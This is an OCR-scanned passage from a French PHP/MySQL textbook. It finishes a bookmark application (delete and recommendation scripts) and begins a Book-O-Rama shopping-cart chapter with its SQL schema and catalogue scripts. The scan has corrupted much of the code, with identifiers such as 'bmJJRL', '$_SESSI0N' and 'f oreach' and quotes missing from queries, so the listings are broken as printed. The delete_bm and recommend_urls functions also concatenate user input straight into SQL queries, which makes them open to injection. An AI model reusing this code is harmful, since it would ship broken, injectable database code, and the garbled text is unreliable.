<td><input type=\"checkbox\" name=\ "del_me[ ] \ " 

value=\" " .$url. "\"/></td> 
</tr>"; 

Toutes ces boites portent le nom del me [ ] . Cela signifie que, dans le script PHP active 
par ce formulaire, nous pouvons acceder a un tableau $del me qui contiendra les favoris 
a effacer. 

Lorsque l'utilisateur clique sur l'option Delete BM, cela active le script delete jbms.php, 
presente au Listing 25.24. 

Listing 25.24 : delete_bms.php — Ce script supprime des favoris dans la base de donnees 



<?php 

require_once ( ' bookmark_f ns . php ' ) ; 
session_start( ) ; 

// Creation de variables aux noms abreges 
$del_me = $_POST[ 'del_me' ] ; 

$valid_user = $_SESSION[ 1 valid_user 1 ] ; 

do_html_header( ' Deleting bookmarks ' ) ; 
check_valid_user ( ) ; 

if ( !filled_out($_POST) ) { 
echo '<p>You have not chosen any bookmarks to delete. <br/> 

Please try again. </p>'; 
display_user_menu ( ) ; 
do_html_footer( ) ; 
exit; 
} else { 
if (count($del_me) > 0) { 
f oreach ($del_me as $url) { 

if (delete_bm($valid_user, $url)) { 

echo 'Deleted ' .htmlspecialchars($url) . ' .<br />'; 
} else { 

echo 'Could not delete ' .htmlspecialchars($url) . ' .<br />'; 

} 

} 

} else { 
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echo 'No bookmarks selected for deletion'; 

} 

} 

// Recupere les favoris de cet utilisateur 
if ($url_array = get_user_urls ($valid_user) ) { 
display_user_urls($url_array) ; 

} 

display_user_menu ( ) ; 
do_html_f ooter( ) ; 

?> 



Ce script commence par effectuer les validations d' usage. Lorsque nous savons que 
l'utilisateur a selectionne des liens pour les supprimer, nous utilisons la boucle suivante 
pour les effacer : 

foreach($del_me as $url) { 

if (delete_bm($valid_user, $url)) { 

echo 'Deleted ' .htmlspecialchars($url) . ' .<br />'; 
} else { 

echo 'Could not delete ' .htmlspecialchars($url) . ' .<br />'; 

} 

} 

Comme vous pouvez le constater, c'est la fonction del f bm ( ) qui s'occupe d'effacer un 
favori de la base de donnees. Cette fonction est presentee dans le Listing 25.25. 

Listing 25.25 : La fonction del_bm() de url_fns.php — Cette fonction supprime un favori 
de la liste de l'utilisateur 



function delete_bm($user, $url) { 

// Supprime un favori de la base de donnees. 
$conn = db_connect ( ) ; 

// Supprime le favori. 

if (! $conn->query ( "delete from bookmark where 

username=' " .$user. " ' and bm_url=' " .$url. )) { 
throw new Exception (' Bookmark could not be deleted'); 

} 

return true; 

} 



Comme vous pouvez le voir, il s'agit egalement d'une fonction assez simple. Elle tente 
de supprimer de la base de donnees un favori associe a un utilisateur. II faut bien noter 
que nous nous contentons de supprimer le favori qui est associe a l'utilisateur courant ; 
les autres utilisateurs peuvent le conserver. 
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La Figure 25.10 montre un exemple du resultat obtenu. 
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Figure 25.10 

Le script de suppression avertit I'utilisateur que des favoris ont ete supprimes, puis affiche ceux 
qui restent. 



Comme dans le script add_bms.php lorsque la base de donnees a ete modifiee, nous 
affichons la nouvelle liste des favoris avec les fonctions get user urls() et 
displays user urls(). 



Implementation de la suggestion de sites 

Pour terminer, il nous reste a ecrire le script qui s'occupe des suggestions de sites, 
recommend.php . 

II existe de nombreuses approches permettant d'implementer cette fonctionnalite. Nous 
avons opte en faveur de suggestions "intelligentes" : nous cherchons les utilisateurs qui 
ont au moins un favori en commun avec I'utilisateur courant en partant du principe qu'il 
est alors possible que ces utilisateurs aient les memes gouts et que leurs sites favoris 
puissent interesser notre utilisateur. 

La methode la plus simple pour implementer cette approche avec une requete SQL 
consiste a utiliser des sous-requetes. La premiere sous-requete ressemble a ceci : 

select distinct(b2.username) 

from bookmark b1 , bookmark b2 
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where b1 . username= ' " . $valid_user . " ' 
and bl.username != b2.username 
and b1.bm_URL = b2.bm_URL) 

Cette requete utilise des alias pour realiser une jointure de la table bookmark avec elle- 
meme (un concept etrange mais parfois bien utile). Imaginons qu'il existe en fait deux 
tables de favoris, b1 et b2. Dans b1 , nous nous interessons a l'utilisateur courant et a ses 
liens. Dans b2, nous pouvons examiner les liens de tous les autres utilisateurs. Nous 
cherchons done tous les autres utilisateurs (b2 . username) possedant un favori en 
commun avec celui de l'utilisateur courant (b1 . bm URL = b2.bm URL) et qui ne sont pas 
l'utilisateur courant (b1 . username != b2 . username). 

Cette requete nous donne une liste de personnes ayant les memes gouts que l'utilisateur 
courant. A l'aide de cette liste, nous pouvons chercher leurs sites favoris avec la requete 
externe : 

select bmJJRL 
from bookmark 
where username in 

(select distinct(b2. username) 

from bookmark b1 , bookmark b2 

where b1 . username= ' " . $valid_user . " 1 

and bl.username != b2. username 

and b1.bm_URL = b2.bm_URL) 

On ajoute une seconde sous-requete pour eliminer la liste des favoris de cet utilisateur 
car, si l'utilisateur possede deja un favori, il est inutile de le lui suggerer. Pour terminer, 
nous ajoutons un filtre supplemental avec la variable $popularity : comme nous ne 
voulons pas suggerer des sites trop personnels, nous nous contentons de suggerer les 
favoris enregistres par plusieurs utilisateurs de la liste. 

La requete finale ressemble a ceci : 

select bmJJRL 
from bookmark 
where username in 

(select distinct(b2. username) 

from bookmark b1 , bookmark b2 

where b1 . username= ' " . $valid_user . " 1 

and bl.username != b2. username 

and b1. bmJJRL = b2. bmJJRL) 
and bmJJRL not in 

(select bmJJRL 

from bookmark 

where username= ' " . $valid_user . " ' ) 
group by bm_url 

having count (bm_url)>" .$popularity; 

Si nous attendons un grand nombre de visiteurs sur notre site, nous pouvons modi- 
fier $popularity pour ne suggerer que les favoris enregistres par un grand nombre 
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d'utilisateurs. En effet, on peut alors supposer qu'ils seront probablement plus interessants 
que les autres. 

L'integralite du script permettant d'effectuer les suggestions est presentee dans les 
Listings 25.26 et 25.27. Le script principal s'appelle recommend.php (Listing 25.26). 
II appelle la fonction recommend urls ( ) de urljns.php (Listing 25.27). 

Listing 25.26 : recommend.php — Ce script suggere certains sites qu'un utilisateur 
pourrait apprecier 



<?php 

require_once( ' bookmark_f ns . php ' ) ; 
session_start ( ) ; 

do_html_header( ' Recommending URLs ' ) ; 
try { 

check_valid_user( ) ; 

$urls = recommend_urls ($_SESSI0N[ 1 valid_user 1 ] ) ; 
display_recommended_urls($urls) ; 

} 

catch(Exception $e) { 
echo $e->getMessage( ) ; 

} 

display_user_menu ( ) ; 
do_html_f ooter( ) ; 

?> 



Listing 25.27 : La fonction recommend _urls() de url_fns.php — Ce script trouve les 
suggestions 



function recommend_urls($valid_user, $popularity = 1) { 
// Nous fournissons des suggestions semi-intelligentes . 
// Si une personne possede un favori en commun avec d' autres 
// utilisateurs, il est possible qu'elle apprecie les autres favoris 
// de ces personnes. 
$conn = db_connect ( ) ; 

// Trouve d' autres utilisateurs 

// possedant un favori en commun avec vous. 

// Pour eviter de renvoyer des pages trop personnelles, 

// et pour ne renvoyer que des pages populaires, 

// nous choisissons un niveau de popularite minimal. 

// Si $popularite = 1, plusieurs personnes doivent avoir enregistre 

// le favori pour que nous le recommandions . 

$query = "select bmJJRL 
from bookmark 
where username in 

(select distinct (b2. username) 
from bookmark b1 , bookmark b2 
where b1 . username= ' " .$valid_user. " ' 
and b1 . username != b2. username 
and b1.bm_URL = b2.bm_URL) 
and bm URL not in 
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(select bm_URL 
from bookmark 

where username= ' " . $valid_user . " 1 ) 
group by bm_url 

having count(bm_url)>" .$popularity; 

if (!($result = $conn->query ($query) ) ) { 

throw new Exception ( 1 Could not find any bookmarks to recommend.'); 

} 

if ($result->num_rows==0) { 

throw new Exception (' Could not find any bookmarks to recommend. 1 ); 

} 

$urls = array ( ) ; 

// Construit un tableau de toutes les URL pertinentes 
for ($count=0; $row = $result->f etch_obj ect ( ) ; $count++) { 
$urls[$count] = $row->bm_URL; 

} 

return $urls; 



Un exemple du resultat de recommend.php est presente a la Figure 25.1 1. 



File Edit View History Bookmarks Tools Help 



x _ ~ • i^£^ | http://localha5t/phpmysql4^/chapter27/recQrnmend,php | * | [> 
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PHPbookmark 



Recommending URLs 

Logged in as jcmeloni. 

Recomme n d ati o n s 

http://wvAiV.3mazon.com 



Home | Add BM | | Change password 

Recommend URLs to me | Logout 



Figure 25. 1 1 

D'apres le script, cet utilisateur pourrait etre interesse par le site amazon.com. Detvx autres utilisateurs 
de notre site qui aiment bien amazon.com ont, en effet, ajoute ce site a leurs favoris. 
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Pour aller plus loin 

Nous avons presente les fonctionnalites de base de 1' application PHPbookmark. Cependant, 
nous pouvons y apporter plusieurs ameliorations : 

■ regrouper les sites favoris par sujets ; 

■ un lien Add this to my bookmarks pour les suggestions ; 

■ des suggestions fondees sur les URL les plus populaires de la base de donnees, ou 
sur un sujet particulier ; 

■ une interface d' administration pour configurer et administrer les utilisateurs et les 
sujets ; 

■ des techniques pour accelerer les recherches de sites interessants et pour les rendre 
plus intelligentes ; 

■ d'autres verifications des entrees saisies par les utilisateurs. 

Faites vos propres experiences ! II s'agit de la meilleure maniere d'apprendre. 

Pour la suite 

Dans le projet suivant, nous verrons comment implementer un panier virtuel permettant 
aux utilisateurs de parcourir notre site, d'y ajouter des articles au fur et a mesure qu'ils 
se promenent, puis de payer avant de quitter le site. 
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Implementation 
d'un panier virtuel 

Dans ce chapitre, nous verrons comment implementer les fonctionnalites de base d'un 
panier virtuel. Nous ajouterons ce panier a la base de donnees de Book-O-Rama que 
nous avons implementee dans la deuxieme partie de ce livre. Nous explorerons egale- 
ment une autre solution : la configuration et l'utilisation d'un panier virtuel PHP open- 
source existant. 

Un panier virtuel electronique (que Ton appelle egalement parfois panier d' achat) 
est un mecanisme permettant d'effectuer des achats en ligne. Au fur et a mesure que 
vous parcourez le catalogue en ligne d'un site, vous pouvez ajouter des articles 
dans votre panier. Lorsque vous avez fini vos achats, vous "passez a la caisse" du 
magasin en ligne, c'est-a-dire que vous reglez les articles contenus dans votre 
panier virtuel. 

Pour implementer un panier virtuel, nous avons besoin des fonctionnalites suivantes : 

■ une base de donnees des produits que nous voulons vendre en ligne ; 

■ un catalogue en ligne de nos produits, enumeres par categorie ; 

■ un panier virtuel pour conserver une trace des articles que l'utilisateur souhaite 
acheter ; 

■ un script de sortie qui s'occupe du paiement et des details de la transaction ; 

■ une interface d' administration. 
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Les composants 

Vous vous souvenez certainement de la base de donnees Book-O-Rama que nous avons 
developpee dans la deuxieme partie de ce livre. Dans ce projet, nous allons implementer et 
mettre en oeuvre le magasin en ligne de Book-O-Rama. Les composants de ce 
systeme doivent permettre d'atteindre les buts suivants : 

■ II nous faut un moyen de connecter la base de donnees au navigateur de l'utilisateur. 
Les utilisateurs doivent pouvoir parcourir les articles par categoric 

■ Les utilisateurs doivent egalement avoir la possibilite de selectionner des articles 
dans le catalogue, pour pouvoir les acheter plus tard. Nous devons conserver une 
trace des articles selectionnes. 

■ Lorsque les utilisateurs ont termine leurs achats, nous devons calculer le montant 
total de leur commande, enregistrer les informations associees a la commande 
(comme 1' adresse de la livraison) et traiter le paiement. 

■ II faut egalement construire une interface d' administration pour le site de Book-O- 
Rama, afm que l'administrateur puisse ajouter et modifier des livres, ainsi que des 
categories de livres. 

Nous pouvons maintenant commencer a concevoir la solution et ses composants. 
Implementer un catalogue en ligne 

Nous possedons deja une base de donnees pour le catalogue de Book-O-Rama. Cepen- 
dant, nous devons y apporter quelques modifications pour cette application. II faudra 
notamment ajouter des categories de livres, comme nous venons de le voir. 

II faudra aussi ajouter certaines informations pour les adresses de paiement, les details 
des transactions, etc. Nous savons deja comment implementer une interface vers une 
base de donnees MySQL a l'aide de PHR done, cette partie devrait etre assez simple. 

Nous devrons egalement utiliser des transactions lorsque nous traiterons les comman- 
des des clients. Pour cela, il faut convertir vos tables Book-O-Rama pour qu'elles utilisent 
le moteur de stockage InnoDB. Ce processus est assez simple. 

Conserver une trace des achats effectues par l'utilisateur 

II est imperatif de conserver une trace des achats effectues par l'utilisateur. Nous avons 
pour cela deux techniques a notre disposition. La premiere consiste a ajouter les selec- 
tions effectuees dans notre base de donnees ; l'autre implique l'utilisation d'une variable 
de session. 

La solution d'une variable de session est plus simple a ecrire, puisqu'elle ne necessite pas 
de faire constamment des requetes sur la base de donnees. Elle evite aussi d'enregistrer 
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dans la base des informations inutiles, comme celles associees aux utilisateurs qui se 
contentent de parcourir le site et de changer d'avis. 

Nous avons par consequent besoin d'implementer une variable ou un ensemble de 
variables de session pour enregistrer les choix d'un utilisateur. Lorsqu'un utilisateur a 
fini de selectionner ses articles et qu'il passe a la caisse, nous ajouterons ces informations 
dans notre base de donnees pour conserver une trace de la transaction. 

Nous pouvons egalement nous servir de ces donnees pour resumer l'etat actuel du 
panier dans un coin de la page, de sorte que 1' utilisateur sache en permanence ce que sa 
commande va lui cotiter. 

Implementer un systeme de paiement 

Dans ce projet, les utilisateurs se contentent de selectionner des articles et de saisir les 
informations necessaries pour la commande. Nous ne traiterons pas reellement les paie- 
ments. II existe un grand nombre de systemes de paiement en ligne avec des implemen- 
tations toutes differentes. Nous nous contenterons done d'ecrire une fonction de base 
qui pourra etre remplacee par une interface vers le systeme de votre choix. 

Bien qu'il existe plusieurs passerelles de paiement possibles et differentes interfaces 
vers celles-ci, les fonctionnalites de traitement en temps reel des cartes de credit sont 
generalement identiques. II faut notamment ouvrir un compte commercial aupres d'une 
banque pour pouvoir accepter les cartes de credit (generalement, votre banque dispose 
d'une liste de fournisseurs recommandes pour le paiement lui-meme). Le fournisseur 
de votre systeme de paiement vous precisera les parametres que vous devrez passer a 
son systeme. De nombreux systemes de paiement peuvent fournir du code PHP que 
vous pourrez utiliser pour remplacer la fonction de base creee dans ce chapitre. 

Le systeme de paiement transmet vos donnees a une banque et renvoie un code de resul- 
tat qui indique le succes de la transaction ou une erreur. En echange de cet envoi 
d'informations, votre passerelle de paiement vous facturera une somme annuelle, ainsi 
qu'une taxe en fonction du nombre ou de la valeur de vos transactions. Certains fournisseurs 
de systemes de paiement font meme payer les transactions annulees. 

Le systeme de paiement choisi aura besoin d'informations sur le client (comme son numero 
de carte de credit), d'informations permettant de vous identifier (pour connaitre le compte 
commercial a crediter) et devra connaitre evidemment le montant total de la transaction. 

Le montant total de la commande peut se calculer a partir de ce qui se trouve dans la 
variable de session du panier virtuel de l'utilisateur. II suffit alors d'enregistrer les infor- 
mations associees a la commande dans la base de donnees et de se debarrasser de la 
variable de session a ce moment-la. 
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Creer une interface d'administration 

Nous construirons egalement une interface d'administration nous permettant d'ajouter, 
de supprimer et de modifier les livres et les categories de livres dans la base de donnees. 

Par exemple, il peut etre necessaire de modifier le prix d'un article, notamment en 
periode de promotion. Cela signifie que, lorsque nous enregistrons la commande d'un 
client, il faut egalement enregistrer le prix de chaque article commande. D'un point de 
vue comptable, ce serait un cauchemar de n'enregistrer que les articles commandes et 
leurs prix courants. Cela signifie egalement que, si le client souhaite nous renvoyer un 
article ou l'echanger, nous devrons lui rembourser le bon montant. 

Dans ce projet, nous n'implementerons pas d' interface de suivi de commande. Nous vous 
laissons le plaisir d'en ajouter une sur ce systeme de base, en fonction de vos besoins. 



Presentation de la solution 

Nous allons maintenant assembler tous les composants. 

Notre systeme peut etre considere en fonction de deux points de vue differents : celui 
de l'utilisateur et celui de l'administrateur. Apres avoir etudie les fonctionnalites neces- 
saires, nous avons pu mettre en place deux architectures differentes, une pour chaque 
point de vue. Elles sont presentees, respectivement, aux Figures 26.1 et 26.2. 
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Traitement 
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Figure 26. 1 

La vue utilisateur du systeme Book-O-Rama permet aux utilisateurs de parcourir les livres 

par categorie, d'afficher les informations associees a un livre, d'ajouter des livres dans leur panier 

virtuel et de les acheter. 
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Figure 26.2 

La vue de I'administrateur du systeme Book-O-Rama permet d'inserer, de modifier etde supprimer 
des livres, ainsi que des categories. 

La Figure 26. 1 presente les principales relations entre les scripts de la partie utilisateur du 

site. Les clients arrivent d'abord sur la page principale, qui presente la liste de toutes les 

categories de livres vendus sur le site. Puis les clients peuvent aller sur la page dediee a 

chaque categorie de livres et ensuite sur la page d'un livre particulier. 

II faut fournir a l'utilisateur un lien permettant d'ajouter un livre dans son panier virtuel. 

Le client doit pouvoir passer sa commande a partir du panier virtuel. 

La Figure 26.2 represente l'interface de I'administrateur, qui contient plus de scripts, 

mais pas beaucoup de nouveau code. Ces scripts permettent a un administrateur 

d'ouvrir une session et d'inserer des livres et des categories. 

Le moyen le plus simple pour implementer la modification et la suppression des livres 
et des categories consiste a presenter a 1' administrateur une version legerement diffe- 
rente de l'interface de l'utilisateur. Comme lui, 1' administrateur pourra parcourir les 
categories et les livres mais, au lieu d' avoir acces au panier virtuel, il pourra acceder a 
la page d'une categorie ou d'un livre afin de les modifier ou de les supprimer. En faisant 
en sorte que les memes scripts puissent s' adapter a la fois aux administrateurs et aux 
clients, nous pouvons economiser beaucoup de temps et d' efforts. 
Les trois modules de code principaux de cette application sont : 

■ le catalogue ; 

■ le panier virtuel et le traitement des commandes (nous les avons places dans le 
meme module parce qu'ils ont beaucoup de points communs) ; 

■ 1' administration. 
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Comme dans le projet du Chapitre 25, nous allons egalement implementer et utiliser 
plusieurs bibliotheques de fonctions. Ici, nous utiliserons une API de fonctions analo- 
gue a celle du projet precedent. Nous tenterons de confiner la partie du code qui produit 
une sortie HTML dans une seule bibliotheque, ann de nous conformer au principe de 
separation de la logique et du contenu et surtout pour que notre code soit plus simple a 
lire et a maintenir. 

Nous devons egalement apporter quelques modifications mineures dans la base de 
donnees Book-O-Rama. Nous l'avons renommee book sc ("sc" pour shopping cart), 
afin de la differencier de celle que nous avions implementee dans la deuxieme partie de 
ce livre. 

Tout le code de ce projet se trouve sur le site Pearson. Le Tableau 26.1 presente un 
recapitulatif de ces fichiers. 

Tableau 26.1 : Les fichiers de I'application panier virtuel 

Nom Module Description 

index. php Catalogue Page d'accueil du site pour les utilisateurs. 

Affiche la liste des categories du systeme. 

show cat . php Catalogue Affiche tous les livres d'une categorie 

particuliere. 

show book. php Catalogue Affiche les details sur un livre particulier. 

show cart, php Panier virtuel Affiche le contenu du panier virtuel. Sert 

egalement a ajouter des articles dans le panier 
virtuel. 

checkout . php Panier virtuel Affiche les details complets de la commande. 

Recupere les details de la transaction. 

purchase, php Panier virtuel Recupere les details de paiement de 

l'utilisateur. 

process, php Panier virtuel Traite les details de paiement et ajoute la 

commande dans la base de donnees. 

login . php Administration Permet aux administrateurs de se connecter 

pour effectuer des modifications. 

logout . php Administration Permet aux administrateurs de se deconnecter. 

admin. php Administration Menu principal d' administration. 

change password form. php Administration Formulaire permettant aux administrateurs de 

modifier leur mot de passe. 
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Tableau 26.1 : Les fichiers de I'application panier virtuel (suite) 

Nom Module Description 

change password . php Administration Modifie le mot de passe des administrateurs. 

insert category form. php Administration Formulaire permettant aux administrateurs 

d'ajouter une nouvelle categorie dans la base 
de donnees. 

insert category, php Administration Insere une nouvelle categorie dans la base de 

donnees. 

insert book form. php Administration Formulaire permettant aux administrateurs 

d'ajouter un nouveau livre dans le systeme. 

insert book, php Administration Insere un nouveau livre dans la base de 

donnees. 

edit category form, php Administration Formulaire permettant aux administrateurs de 

modifier une categorie. 

edit category . php Administration Modifie une categorie dans la base de 

donnees. 

edit book form, php Administration Formulaire permettant aux administrateurs de 

modifier les details d'un livre. 

edit book. php Administration Modifie un livre dans la base de donnees. 

delete category . php Administration Supprime une categorie dans la base de 

donnees. 

delete book, php Administration Supprime un livre dans la base de donnees. 

book sc fns.php Fonctions Ensemble de fichiers a inclure pour cette 

application. 

admin fns.php Fonctions Ensemble de fonctions utilisees par les scripts 

d' administration. 

book fns.php Fonctions Ensemble de fonctions pour enregistrer et 

recuperer les donnees d'un livre. 

order fns.php Fonctions Ensemble de fonctions pour enregistrer et lire 

les donnees d'une commande. 

output fns.php Fonctions Ensemble de fonctions pour generer du code 

HTML. 

data valid fns.php Fonctions Ensemble de fonctions pour la validation des 

donnees d'entree. 
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Tableau 26.1 : Les fichiers de ('application panier virtuel (suite) 



Nom 


Module 


Description 


db fns.php 


Fonctions 


Ensemble de fonctions pour se connecter a la 
base de donnees book sc. 


user auth fns.php 


Fonctions 


Ensemble de fonctions pour l'authentification 
des administrateurs. 


book sc.sql 


SQL 


Requetes SQL pour initialiser la base de 
donnees book sc. 


populate . sql 


SQL 


Requetes SQL pour inserer quelques donnees 
en exemple dans la base de donnees book sc. 



Interessons-nous maintenant a 1' implementation de chacun de ces modules. 

— Info 

Cette application contient beaucoup de code dont la plupart a ete deja etudie (notamment 
au Chapitre 25), comme I'enregistrement et la lecture de donnees dans la base et l'authen- 
tification des administrateurs. Nous passerons tres rapidement sur ces parties, pour nous 
concentrer sur les fonctions du panier virtuel. 

Implementation de la base de donnees 

Comme nous l'avons deja vu, il faut apporter quelques modifications mineures a la base de 
donnees Book-O-Rama que nous avons presentee dans la deuxieme partie de ce livre. 

Les instructions SQL permettant de creer la base de donnees book sc sont presentees 
dans le Listing 26.1. 

Listing 26.1 : book_sc.sql — Les instructions SQL permettant de creer la base de 
donnees book_sc 



create database book_sc; 

use book_sc; 

create table customers 
( 

customerid int unsigned not null auto_increment primary key, 
name char(60) not null, 
address char(80) not null, 
city char(30) not null, 
state char(20) , 
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zip char(10) , 
country char(20) not null 
) type=InnoDB; 

create table orders 
( 

orderid int unsigned not null auto_increment primary key, 
customerid int unsigned not null references customers(customerid) , 
amount float(6,2) , 
date date not null, 
order_status char(10), 
ship_name char(60) not null, 
ship_address char(80) not null, 
ship_city char(30) not null, 
ship_state char(20), 
ship_zip char(10) , 
ship_country char(20) not null 
) type=InnoDB; 

create table books 
( 

isbn char(13) not null primary key, 
author char(100) , 
title char(100) , 
catid int unsigned, 
price float(4,2) not null, 
description varchar(255) 
) type=InnoDB; 

create table categories 
( 

catid int unsigned not null auto_increment primary key, 
catname char(60) not null 
) type=InnoDB; 

create table order_items 
( 

orderid int unsigned not null references orders(orderid) , 
isbn char(13) not null references books(isbn), 
item_price float(4,2) not null, 
quantity tinyint unsigned not null, 
primary key (orderid, isbn) 
) type=InnoDB; 

create table admin 
( 

username char(16) not null primary key, 
password char(40) not null 

); 

grant select, insert, update, delete 
on book_sc* 

to book_sc@localhost identified by 'password'; 
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Bien que l'interface d'origine de Book-O-Rama soit tout a fait correcte, nous devons la 
modifier legerement pour pouvoir la mettre en ligne. 

Voici la liste des modifications que nous avons apportees a la base de donnees 
d'origine : 

■ L'ajout de champs d'adresses supplementaires pour les clients. Ces champs sont 
particulierement importants, maintenant que nous implementons une application 
plus realiste. 

■ L'ajout d'une adresse de livraison dans les commandes. L'adresse d'un client peut 
etre differente de l'adresse de livraison, en particulier s'il se sert de notre site pour 
offrir un cadeau. 

■ L'ajout d'une table pour les categories et d'une colonne catid dans la table books. 
Si nous trions les livres par categories, le site sera plus simple a utiliser. 

■ L'ajout de item price dans la table order items pour pouvoir modifier le prix des 
articles. II faut en effet connaitre le prix d'un article au moment ou le client l'a 
achete. 

■ L'ajout d'une table admin pour enregistrer le nom d'utilisateur et le mot de passe des 
administrateurs. 

La suppression de la table commentaires. Au lieu d'ajouter un commentaire pour 
chaque livre, nous preferons ajouter un champ de description. 

La modification des moteurs de stockage afin de passer a InnoDB. Cette operation 
est necessaire pour utiliser des cles etrangeres, mais egalement des transactions lors 
de 1' entree des informations de commande des clients. 

Pour configurer cette base de donnees sur votre systeme, il suffit d'executer le script 
book sc . sql sous le compte de l'utilisateur root de MySQL : 

mysql -u root -p < book_sc.sql 

Vous devrez naturellement saisir le mot de passe root. 

II faudra au prealable modifier le mot de passe de l'utilisateur book sc pour en 
choisir un plus adapte que 1 password ' . Notez que, si vous changez le mot de passe 
dans book_sc.sql, vous devrez aussi le changer dans db_fns.php (nous y reviendrons 
bientot). 

Nous avons egalement fourni un nchier d'exemple populate.sql contenant plusieurs 
donnees. Vous pouvez ajouter ces donnees dans la base de donnees en executant ce 
fichier avec MySQL, comme precedemment. 



Chapitre 26 



Implementation d'un panier virtue! 615 



Implementation du catalogue en ligne 

Dans cette application, le catalogue est implements a l'aide de trois scripts : la page 
principale, la page des categories et la page des livres. 

La page d' accueil du site est produite par le script index.php. La sortie de ce script est 
presentee a la Figure 26.3. 



Figure 26.3 

La page d'accueil 
du site affiche les 
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Vous remarquerez que, outre la liste des categories, il y a un lien vers le panier virtuel 
dans le coin superieur droit de l'ecran, ainsi que quelques informations resumant le 
contenu de ce panier virtuel. Pour les utilisateurs, ces informations apparaissent sur 
toutes les pages du site. 

Si un utilisateur clique sur l'une des categories, il est amend sur la page de la categorie 
correspondante, produite par le script show_cat.php. La page correspondant aux livres 
qui traitent d'Internet est presentee a la Figure 26.4. 

Tous les livres de cette categorie sont presentes sous forme de liens. Si un utilisateur 
clique sur l'un d'eux, il obtient les informations relatives au livre selectionne. La 
Figure 26.5 presente un exemple de page affichant la presentation d'un livre. 

Sur cette page, outre le lien View Cart, nous avons un lien Add to Cart grace auquel 
l'utilisateur peut choisir un article a acheter. Nous y reviendrons lorsque nous nous atta- 
querons a 1' implementation du panier virtuel. 

Interessons-nous maintenant a chacun de ces trois scripts. 
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Figure 26.4 

Chaque livre de la categorie est presente avec une photo. 
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Figure 26.5 

II y a une page pour chaque livre contenant plus d'informations sur ce livre, ainsi qu'une longue 
description. 
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Liste des categories 

Le premier script, index.php, fournit la liste de toutes les categories de la base de 
donnees. II est presente dans le Listing 26.2. 

Listing 26.2 : index.php — Ce script genere la page d'accueil du site 

<?php 

include ( ' book_sc_f ns . php ' ) ; 

// Le panier virtuel ayant besoin des sessions, on en lance une. 
session_start() ; 

do_html_header( "Welcome to Book-O-Rama" ) ; 

echo "<p>Please choose a category :</p>" ; 

// Recupere les categories a partir de la base de donnees 
$cat_array = get_categories ( ) ; 

// On les affiche comme des liens vers les pages des categories 
display_categories($cat_array) ; 

// Si on est connecte comme admin, affiche les liens pour ajouter, 
// supprimer et modifier les categories 
if (isset($_SESSION[ ' admin_user ' ] ) ) { 

display_button ( "admin . php" , "admin-menu", "Admin Menu"); 

} 

do_html_f ooter( ) ; 

?> 



Ce script commence par inclure book_sc_fns.php, le fichier contenant toutes les biblio- 
theques de fonctions de cette application. 

Puis nous devons debuter une session pour pouvoir utiliser le panier virtuel. Chaque 
page de ce site se servira de la session. 

Viennent ensuite quelques appels a des fonctions de generation HTML, comme 
do html header() et do html footer() (ces deux fonctions sont definies dans 
output Jhs.php). 

Le code verifie ensuite si l'utilisateur a ouvert une session en tant qu'administrateur, 
auquel cas il propose des options de navigation legerement differentes. Nous reviendrons 
sur cette partie dans la section consacree aux fonctions d' administration. 

La partie la plus importante du script est la suivante : 

// Recupere les categories a partir de la base de donnees 
$cat_array = get_categories ( ) ; 

// On les affiche comme des liens vers les pages des categories 
display_categories($cat_array) ; 
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Les fonctions get categories () et display categories () sont definies, respective - 
ment, dans les bibliotheques fctsjtivres.php et output _fns.php. La fonction 
get categories () renvoie un tableau contenant les categories du systeme, qui est 
ensuite passe a display categories ( ). Le Listing 26.3 contient le code de 
get categories( ). 

Listing 26.3 : La fonction get_categories() de output_fns.php — Cette fonction 
recupere une liste des categories dans la base de donnees 



function get_categories ( ) { 

// Cherche dans la base de donnees une liste des categories. 
$conn = db_connect( ) ; 

$query = "select catid, catname from categories"; 
$result = @$conn->query ($query) ; 
if (!$result) { 
return false; 

} 

$num_cats = @$result->num_rows ; 
if ($num_cats == 0) { 
return false; 

} 

$result = db_result_to_array($result) ; 
return $result; 

} 



Comme vous pouvez le constater, cette fonction se connecte a la base de donnees et 
recupere la liste de tous les identificateurs de categories et les noms correspondants. 
Nous nous servons pour cela d'une fonction appelee db result to array () qui se 
trouve dans db_fns.php et qui est presentee dans le Listing 26.4. Elle prend en parame- 
tre un descripteur de resultat MySQL et renvoie un tableau de lignes indicees par des 
nombres dans lequel chaque ligne est elle-meme un tableau associatif. 

Listing 26.4 : La fonction db_result_to_array() de db_fns.php — Cette fonction 
convertit un descripteur de resultat MySQL en un tableau de resultats 



function db_result_to_array ($result) { 
$res_array = array(); 

for ($count=0; $row = $result->f etch_assoc( ) ; $count++) { 
$res_array[$count] = $row; 

} 

return $res_array; 

} 



Ici, nous renvoyons ce tableau a index.php, ou nous le passons ensuite a la fonction 
display categories () de output _fns.php. Cette fonction affiche chaque categorie 
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sous forme d'un lien vers la page contenant les livres de cette categorie. Le code de 
cette fonction est presente dans le Listing 26.5. 

Listing 26.5 : La fonction display _categories() de output_fns.php — Cette fonction 
affiche un tableau de categories sous la forme d'une liste de liens vers ces categories 



function display_categories ($cat_array ) { 
if ( ! is_array ($cat_array ) ) { 

echo "<p>No categories currently available</p>" ; 
return ; 

} 

echo "<ul>"; 

foreach ($cat_array as $row) { 
$url = "show_cat.php?catid=" . ($row[ 'catid' ] ) ; 
$title = $row[ ' catname ' ] ; 
echo "<li>"; 

do_html_url($url, $title); 
echo "</li>"; 

} 

echo "</ul>"; 
echo "<hr />"; 

} 



Cette fonction convertit en lien HTML chaque categorie de la base de donnees. Chaque 
lien est ensuite passe au script suivant, show_cat.php, mais chaque fois avec un parame- 
tre different : l'identificateur de la categorie (catid). II s'agit d'un identificateur 
unique, produit par MySQL, qui peut etre utilise pour identifier une categorie. 

Ce parametre, passe au script suivant, determine en fin de compte la categorie qui nous 
interesse. 



Liste des livres d'une categorie 

Le processus permettant de lister les livres d'une categorie est tres comparable. Le 
script qui s'occupe de cette tache est ajfiche_cat.php et vous trouverez son code dans le 
Listing 26.6. 

Listing 26.6 : showjcat.php — Ce script affiche les livres d'une categorie particuliere 



<?php 

include ( ' book_sc_f ns . php ' ) ; 

// Le panier virtuel a besoin des sessions, done nous en ouvrons une. 
session_start() ; 

$catid = $_GET[ 'catid' ] ; 

$name = get_category_name($catid) ; 

do_html_header( ) ; 



// Recupere les informations sur les livres dans la base de donnees. 
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$book_array = get_books($catid) ; 
display_books($book_array) ; 

// Si on est connecte comme Admin, on rajoute des liens pour modifier 
// les categories 

if (isset($_SESSION[ 'admin_user 1 ] ) ) { 

display_button("index.php" , "continue", "Continue Shopping"); 
display_button ( "admin . php" , "admin-menu", "Admin Menu"); 
